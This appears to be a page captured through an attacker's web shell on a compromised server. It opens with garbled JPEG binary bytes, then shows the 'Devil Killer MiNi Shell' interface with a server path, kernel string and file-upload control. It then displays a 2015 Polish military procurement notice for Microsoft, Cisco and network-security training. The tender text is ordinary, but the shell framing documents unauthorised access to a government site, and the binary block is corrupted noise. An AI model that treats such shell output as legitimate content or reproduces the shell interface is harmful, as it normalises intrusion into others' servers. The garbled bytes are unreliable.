JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150225/41582-N-2015.html

<p class="kh_header"><b>Bydgoszcz: PRZEPROWADZENIE SZKOLEŃ AUTORYZOWANYCH Z TECHNOLOGII MICROSOFT I CISCO ORAZ WARSZTATÓW Z ZAKRESU BEZPIECZEŃSTWA TELEINFORMATYCZNEGO</b><br>
<b>Numer ogłoszenia: 41582 - 2015; data zamieszczenia: 25.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 11 Wojskowy Oddział Gospodarczy , ul. Gdańska 147, 85-915 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 378 13 19, faks 52 378 13 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.11wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojskowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE SZKOLEŃ AUTORYZOWANYCH Z TECHNOLOGII MICROSOFT I CISCO ORAZ WARSZTATÓW Z ZAKRESU BEZPIECZEŃSTWA TELEINFORMATYCZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia w zakresie:
CZĘŚĆ I - Technologia Microsoft
	Szkolenie Zaawansowane konfigurowanie Usług w Windows Server 2012: - dla 6 osób - (min. 40 godzin),
Program szkolenia powinien być zgodny z programem autoryzowanego szkolenia 20412 Configuring Advanced Windows Server 2012 Services i zawierać przynajmniej:
	Implementacja zaawansowanych usług sieciowych 
	konfigurowanie zaawansowanych funkcji DHCP
	konfigurowanie zaawansowanych funkcji DNS.
	Wdrażania zaawansowanych usług plikowych 
	konfiguracja iSCSI
	konfigurowanie Branch Cache
	optymalizacja wykorzystania pamięci masowych.
	Implementacja dynamicznej kontroli dostępu 
	omówienie dynamicznej kontroli dostępu
	planowanie wdrożenia dynamicznej kontroli dostępu
	konfigurowanie dynamicznej kontroli dostępu.
	Implementacja równoważenia obciążenia sieciowego 
	omówienie równoważenia obciążenia sieciowego 
	konfigurowanie klastra równoważenia obciążenia sieciowego
	planowanie wdrożenia równoważenia obciążenia sieciowego.
	Wdrażanie Failover Clustering 
	omówienie Failover Clustering
	implementacja Failover Clustering
	konfigurowanie wysokiej dostępności aplikacji i usług w Failover Clustering
	utrzymanie Failover Clustering
	implementacja rozproszonego Failover Clustering.
	Wdrażanie Failover Clustering z Hyper-V 
	omówienie integracji Hyper-V z Failover Clustering
	implementacja maszyn wirtualnych na klastrze
	implementacja przenoszenia maszyn wirtualnych
	zarządzanie środowiskiem wirtualnym za pomocą System Center Virtual Machine Manager.
	Wdrażanie odzyskiwania po awarii 
	omówienie odzyskiwania po awarii
	implementacja Windows Server Backup
	implementacja odzyskiwania serwera i danych.
	Implementacja rozproszonych wdrożeń AD DS 
	omówienie rozproszonych wdrożeń AD DS
	implementacja rozproszonych wdrożeń AD DS
	konfigurowanie trustów AD DS.
	Implementacja siteów AD DS i replikacji 
	omówienie replikacji usług AD DS
	konfiguracja siteów AD DS
	konfigurowanie i monitorowanie replikacji.
	Wdrożenie AD CS 
	omówienie infrastruktury klucza publicznego 
	wdrażanie urzędów certyfikacji
	wdrażanie i zarządzanie szablonami certyfikatów
	implementacja dystrybucji i unieważniania certyfikatu
	zarządzanie odzyskiwaniem certyfikatów.

	Implementacja usług AD RMS 
	omówienie Active Directory Rights Management
	wdrażanie i zarządzanie infrastrukturą AD RMS 
	konfigurowanie ochrony zawartości w AD RMS
	konfigurowanie dostępu z zewnątrz do AD RMS.
	Implementacja usług AD FS 
	omówienie Active Directory Federation Services
	wdrażanie Active Directory Federation Services
	implementacja AD FS dla organizacji
	wdrażanie scenariusza AD FS między przedsiębiorstwami. 
 Dodatkowe wymagania:
	czas realizacji - od poniedziałku do piątku w godzinach 9-17,
	szkolenia obejmą część teoretyczną oraz praktyczną,
	szkolenie musi być autoryzowane przez Microsoft, prowadzone przez autoryzowanych instruktorów,
	szkolenie musi być prowadzone w języku polskim,
	Wykonawca zapewni autoryzowane materiały szkoleniowe w języku polskim lub języku angielskim, w przypadku, gdy materiały nie są dostępne w języku polskim,
	materiały szkoleniowe powinny być w formie elektronicznej, dostęp do materiałów podczas szkolenia musi być realizowany na oddzielnym urządzeniu niż komputer niezbędny do wykonywania ćwiczeń, po zakończeniu szkolenia każdy uczestnik szkolenia musi posiadać dostęp do  materiałów szkoleniowych,
	 materiały szkoleniowe zostaną dostarczone najpóźniej w dniu rozpoczęcia szkolenia,
	organizator szkoleń wyda certyfikat ukończenia autoryzowanego szkolenia,
	Zamawiający wymaga, aby Wykonawca zapewnił wykładowców, niezbędne zaplecze techniczne oraz standardowo przyjęte (dla danej technologii) wyposażenie laboratorium szkoleniowego do przeprowadzenia zajęć, 
	liczba stanowisk komputerowych ma odpowiadać liczbie uczestników,
	Wykonawca zobowiązany jest uwzględnić w cenie oferty wszystkie koszty związane z organizacją szkolenia, w tym wynagrodzenie wykładowców, materiałów szkoleniowych, wynajmu pomieszczeń, cateringu i wyżywienia, transportu, oprzyrządowania, wystawienia certyfikatów, itp.,
	w ciągu dnia szkoleniowego przewidziane będą przerwy w ramach których Wykonawca zapewni: napoje (woda gazowana, niegazowana, kawa, herbata),
	przedstawiciel Zamawiającego w ciągu 7 dni po podpisaniu umowy uzgodni z osobami wyznaczonymi ze strony Wykonawcy  szczegółowy harmonogram.
CZĘŚĆ II - Technologia Cisco

	Szkolenie Rozwiązywanie problemów w serwerach UCS - dla 2 osób - (min. 24 godziny) + Egzamin certyfikacyjny Cisco: 300-101 Route 
Program szkolenia powinien być zgodny z programem autoryzowanego szkolenia  Cisco Troubleshooting Cisco Data Center Unified Computing i zawierać przynajmniej:
	Rozwiązywanie problemów z Cisco UCS B-Series 
	Rozwiązywanie problemów z architekturą i inicjalizacją
	Rozwiązywanie problemów z konfiguracją
	Rozwiązywanie problemów operacyjnych
	Rozwiązywanie problemów z połączeniami LAN i SAN
	Rozwiązywanie problemów z UCS Managerem oraz podnoszenie wersji      oprogramowania
	Rozwiązywanie problemów ze sprzętem
	Rozwiązywanie problemów z Cisco UCS C-Series

	Cisco UCS C-Series architektura i konfiguracja
	Rozwiązywanie problemów ze sprzętem i oprogramowaniem typu Firmware
	Rozwiązywanie problemów z połączeniami LAN i SAN
	Rozwiązywanie problemów z lokalnymi dyskami
	Rozwiązywanie problemów - kwestie związane z Systemami Operacyjnymi 
	Rozwiązywanie problemów z integracją Cisco UCS C-Series

	Integracja Cisco UCS C-Series and Cisco UCS Manager (architektura, instalacja, weryfikacja)
	Rozwiązywanie problemów z integracją Cisco UCS C-Series oraz Cisco UCS Manager (problemy z urządzeniami FEX, problemy z serwerami serii C)
	Szkolenie Wprowadzenie do technologii  802.1X w urządzeniach Cisco: - dla 2 osób - (min. 24 godziny) +  Egzamin certyfikacyjny Cisco: 300-115 Switch, 

Program szkolenia powinien być zgodny z programem autoryzowanego szkolenia Cisco Introduction to 802.1X Operations for Cisco Security Professionals i  zawierać przynajmniej:

	Wstęp do zagadnień uwierzytelniania sieciowego 
	Architektura Cisco TrustSec
	Protokół IEEE 802.1X
	Protokoły uwierzyleniania opearte o Extensible Authentication Protocol (EAP)
	Rola protokołu RADIUS w rozwiązaniach opartych o EAP
	Oprogramowanie Cisco Identity Services Engine (ISE) i jego rola w architekturze TrustSec
	Przykłady konfiguracji w rozwiazaniach kablowych (Wired) w oparciu o przełączniki Catalyst
	Przykłady konfiguracji w rozwiązaniach bezprzewodowych (Wireless) w oparciu o koncentratory WLC

Dodatkowe wymagania (dotyczy pkt a i b):
	czas realizacji - od poniedziałku do piątku w godzinach 9-17,
	szkolenia obejmą część teoretyczną oraz praktyczną,
	szkolenia muszą być autoryzowane przez Cisco, prowadzone przez autoryzowanych instruktorów,
	szkolenia muszą być prowadzone w języku polskim,
	Wykonawca zapewni autoryzowane materiały szkoleniowe w języku polskim lub języku angielskim, w przypadku, gdy materiały nie są dostępne w języku polskim,
	materiały szkoleniowe powinny być w formie elektronicznej, dostęp do materiałów podczas szkolenia musi być realizowany na oddzielnym urządzeniu niż komputer niezbędny do wykonywania ćwiczeń, po zakończeniu szkolenia każdy uczestnik szkolenia musi posiadać dostęp do  materiałów szkoleniowych,
	 materiały szkoleniowe zostaną dostarczone najpóźniej w dniu rozpoczęcia szkolenia,
	organizator szkoleń wyda certyfikat ukończenia autoryzowanego szkolenia,
	zamawiający wymaga, aby Wykonawca zapewnił wykładowców, niezbędne zaplecze techniczne oraz standardowo przyjęte (dla danej technologii) wyposażenie laboratorium szkoleniowego do przeprowadzenia zajęć, 
	liczba stanowisk komputerowych ma odpowiadać liczbie uczestników,
	Wykonawca zobowiązany jest uwzględnić w cenie oferty wszystkie koszty związane z organizacją szkolenia, w tym wynagrodzenie wykładowców, materiałów szkoleniowych, wynajmu pomieszczeń, cateringu i wyżywienia, transportu, oprzyrządowania, wystawienia certyfikatów, itp.,
	w ciągu dnia szkoleniowego przewidziane będą przerwy w ramach których Wykonawca zapewni: napoje (woda gazowana, niegazowana, kawa, herbata), 
	przedstawiciel Zamawiającego w ciągu 7 dni po podpisaniu umowy uzgodni z osobami wyznaczonymi ze strony Wykonawcy  szczegółowy harmonogram.

CZĘŚĆ III - Bezpieczeństwo teleinformatyczne

Bezpieczeństwo i monitorowanie sieci komputerowych - dla 10 osób (2 grupy po 5 osób w 2 różnych terminach) - (min. 40 godzin),

Program szkolenia powinien  zawierać przynajmniej:
 Elementy bezpieczeństwa LAN
- Bezpieczenstwo fizyczne
- Granica zaufania
 Zagrożenia w sieciach LAN
- Ataki na poszczególne warstwy modelu ISO/OSI
Koncepcja AAA (Authentication, Authorization, Accounting)
Rozliczanie - Accounting
- Monitoring i logowanie w sieciach LAN
- Obsługa zdarzeń
- Klasyfikacja zdarzeń
- Analiza i korelacja zdarzeń
 Autoryzacja - Authorization
- Listy dostępu ACL
- Zapory sieciowe
- Serwery usług
- Prawa użytkowników w systemach operacyjnych na przykładzie MS W2008 Server
 Uwierzytelnianie - Authentication
- Elementy infrastruktury klucza publicznego
- Technologie w PKI
- PKI w praktyce
- źródła uwierzytelniania
- Lokalne bazy użytkowników
- Serwery katalogowe
- PKI
- Hasła jednorazowe, tokeny
- Systemy hybrydowe - NAC, NAP
 Systemy realizujące wybrane funkcje AAA
- RADIUS - Zliczanie aktywności użytkowników
- 802.1x - kontrola dostępu i uwierzytelnianie
- Architektura systemu
- Serwer RADIUS
- Implementacje w sieciach przewodowych i bezprzewodowych
 System Firewall
- typy Firewalli
- konfiguracja Firewalla
- systemy UTM
 Konfiguracja urządzeń sieciowych pod kątem monitorowania i analizy ruchu
 Systemy wykrywania włamań
- IDS hostowy
- IDS sieciowy
- określanie zasad monitorowania zdarzeń
- reakcje na incydent
 HoneyPot
- typy honeypotów
- instalacja i konfiguracja
 Kontrola ruchu sieciowego
- analiza ruchu sieciowego
- natężenie ruchu i statystki
- SNMP w analizie ruchu sieciowego
- RMON
- Netflow
- Sflow
 Zarzadzanie logami
- logi systemowe
- logi z systemów bezpieczeństwa
- archiwizacja logów

Dodatkowe wymagania:
	czas realizacji - od poniedziałku do piątku w godzinach 9-17,
	warsztaty obejmą część teoretyczną oraz praktyczną,
	warsztaty muszą być prowadzone w języku polskim,
	Wykonawca zapewni autoryzowane materiały szkoleniowe w języku polskim lub języku angielskim, w przypadku, gdy materiały nie są dostępne w języku polskim,
	materiały szkoleniowe powinny być w formie elektronicznej, dostęp do materiałów podczas szkolenia musi być realizowany na oddzielnym urządzeniu niż komputer niezbędny do wykonywania ćwiczeń, po zakończeniu szkolenia każdy uczestnik szkolenia musi posiadać dostęp do  materiałów szkoleniowych,
	 materiały szkoleniowe zostaną dostarczone najpóźniej w dniu rozpoczęcia szkolenia,
	organizator warsztatów wyda certyfikat ukończenia warsztatów,
	Zamawiający wymaga, aby Wykonawca zapewnił wykładowców, niezbędne zaplecze techniczne oraz standardowo przyjęte (dla danej technologii) wyposażenie laboratorium szkoleniowego do przeprowadzenia zajęć, 
	liczba stanowisk komputerowych ma odpowiadać liczbie uczestników,
	Wykonawca zobowiązany jest uwzględnić w cenie oferty wszystkie koszty związane z organizacją szkolenia, w tym wynagrodzenie wykładowców, materiałów szkoleniowych, wynajmu pomieszczeń, cateringu i wyżywienia, transportu, oprzyrządowania, wystawienia certyfikatów, itp.,
	w ciągu dnia szkoleniowego przewidziane będą przerwy w ramach których Wykonawca zapewni: napoje (woda gazowana, niegazowana, kawa, herbata),
	przedstawiciel Zamawiającego w ciągu 7 dni po podpisaniu umowy uzgodni z osobami wyznaczonymi ze strony Wykonawcy  szczegółowy harmonogram..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego, Wykonawcy nie wnoszą wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu w zakresie posiadania uprawnień 
do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie uznany za spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie uznany za spełniony, gdy Wykonawca złoży oświadczenie o spełnieniu warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym zostanie uznany za spełniony gdy Wykonawca złoży oświadczenie o spełnieniu warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie uznany za spełniony, gdy;
Wykonawca winien dysponować wykładowcami, którzy posiadają odpowiednie kwalifikacje do przeprowadzenia szkoleń, tj. osoby, które posiadają kwalifikacje zawodowe - certyfikowani trenerzy danej technologii.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej zostanie uznany za spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykaz wykonanych usług stanowiących podstawę do oceny ofert 
w kryterium doświadczenie - załącznik nr 8 do SIWZ. Do wykazanych usług dla uzyskania punktów należy złożyć także dowody potwierdzające należyte wykonanie wykazanych usług.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - DOŚWIADCZANIE W PRZEPROWADZANIU SZKOLEŃ - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z zaistnienia następujących warunków:
1)	   zaistnienia okoliczności niezależnych od stron umowy, których nie można było przewidzieć w chwili zawarcia umowy;
2)	  zmienionych faktycznych potrzeb Zamawiającego;
3)	  ograniczenia środków finansowych przeznaczonych na realizację umowy (na skutek zmiany planu rzeczowo-finansowego);
4)	  potrzeby zmian wynikających z postanowień niniejszej umowy;
5)	  zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy;
6)	  zmiany obowiązującej stawki VAT.
1.	Warunkiem wprowadzenia zmian, o których mowa w ust. 1, jest złożenie wniosku wraz z uzasadnieniem zawierającym, odpowiednio: opis propozycji zmian, uzasadnienie zmian, obliczenie kosztów zmian, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy, wpływ zmian na termin wykonania umowy . 
2.	Wszelkie zmiany treści niniejszej umowy oraz jej uzupełniania wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem ust. 4.
3.	O wszelkich zmianach nazwy, adresu i danych identyfikacyjnych firmy oraz numeru rachunku bankowego Wykonawca powiadomi na piśmie niezwłocznie Zamawiającego pod rygorem poniesienia kosztów związanych z brakiem właściwych danych u Zamawiającego oraz rygorem uznania za doręczoną korespondencji kierowanej na ostatnio wskazany przez Wykonawcę adres. Zmiany te nie wymagają sporządzenia aneksu do umowy. 
4.	Wykonawca nie może domagać się zmiany postanowień zawartej umowy w związku z niewykonaniem lub nienależytym wykonaniem przez niego zobowiązań wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.11wog.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 11 Wojskowy Oddział Gospodarczy ul. Gdańska 147, 
85 - 915 Bydgoszcz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2015 godzina 09:00, miejsce: 11 Wojskowy Oddział Gospodarczy ul. Gdańska 147, 
85 - 915 Bydgoszcz - kancelaria jawna. Godz. pracy kancelarii 7.30 - 9.00 
i 12.30 - 15.15 w dni robocze od poniedziałku do piątku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
